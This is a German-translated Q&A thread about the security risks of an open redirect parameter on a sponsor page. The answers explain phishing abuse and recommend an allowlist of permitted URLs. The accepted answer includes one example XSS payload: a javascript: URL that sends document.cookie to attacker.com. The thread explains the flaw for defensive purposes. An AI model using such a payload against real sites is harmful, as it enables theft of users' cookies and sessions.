Können Sie das Web-Sicherheitsproblem hier finden?
Frage
Ich habe eine Webseite, die zu einer anderen Webseite wie diese Umleitungen:
http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html
Dann wird die Sponsor.php Seite zeigt eine Anzeige mit einem Link zu sagen „um Ihre Seite Weiter“, die in RedirectPage zum weitergegeben verbinden. Gibt es Sicherheit / Spoofing Probleme, die daraus kommen könnte? Was ist der beste Weg, dies zu umgehen? (Beachten Sie, dass der Benutzer nicht in zu jeder Website angemeldet ist)
Lösung
Es ist ein großes Problem. Wenn ich senden Sie einen Link, der wie folgt aussieht:
http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14
Du wirst denken: „Oh, CNN, das ist eine legitime Website“, und Sie werden es öffnen, und klicken Sie auf ‚Weiter auf Ihre Seite‘ -Link. Und dann werden Sie auf dem Netz auf einen der übelsten Porno-Seiten sein, und es wird einen riesigen Boom männliche Stimme kündigt an alle Ihre Mitarbeiter "Hot Damn I Wanna! @ $ @ # $ Ihr! (& ¤ & ^ $ § bis ich kann nicht ¡⌐ ^ (! # ~~ & $ # ^! @ $ !! "und Sie werden zu Ihrem Chef erklären:" ich dachte, es war CNN "
Das Loch ist hier Ihr Ruf . Blind Umleitungen wie diese sind gefährlich.
Und das ist nur ein Loch. Wie wäre das?
http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie
Jetzt habe ich XSS-ed Ihre Website und Ihre Benutzer-Cookies gestohlen. Sicher, sagen Sie es gibt keine Login-Infos, aber wie etwa Sitzungsdaten? Oder, wenn Sie fügen Sie ein Login später, oder jemand anderes in Ihrem Unternehmen verwendet diese Seite ein Jahr später, wo Benutzer angemeldet sind.
Andere Tipps
Dies ist definitiv ein Sicherheitsrisiko. Sie sollten mit in-URL-Variablen vermeiden, wenn die Sicherheit beteiligt ist.
Während nichts völlig sicher ist, ist dies eine viel bessere Möglichkeit, dieses Problem zu handhaben: http: //www.webmasterworld.com/forum88/2910.htm
Wenn sponsor.php einen beliebigen Wert in RedirectPage ermöglicht und Anzeigen implizieren eine Billigung oder Menschen ermutigen, zu denken, dass sie auf dem richtigen Weg sind Sie würden öffnen sie Teil einer Phishing-Attacke zu sein. Was noch schlimmer ist, würden Sie wahrscheinlich von diesen Angriffen zu profitieren, die Menschen wahrscheinlich machen würde eher unzufrieden.
Die Aufrechterhaltung einer Liste der zulässigen URLs (oder Muster, die sie folgen können) würde ein langer Weg Probleme zu vermeiden.